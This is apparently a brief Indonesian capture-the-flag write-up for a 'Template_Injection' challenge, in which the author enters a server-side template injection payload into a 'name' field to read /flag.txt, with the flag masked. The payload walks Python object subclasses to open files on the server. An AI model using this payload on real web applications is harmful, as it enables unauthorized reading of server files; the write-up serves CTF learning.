Template_Injection-Reversing Osiris

Template_Injection.

Terdapat soal dengan “Read /flag.txt from the server https://recruit.osiris.bar:32001”

dan kita coba buka linknya,





di link tersebut terdapat kolom name.kita coba payloads dengan ssti-payloads {{

''.__class__.__mro__[2].__subclasses__()[40]('/flag.txt').read() }}


dan hasilnya,





flag :flag{*************}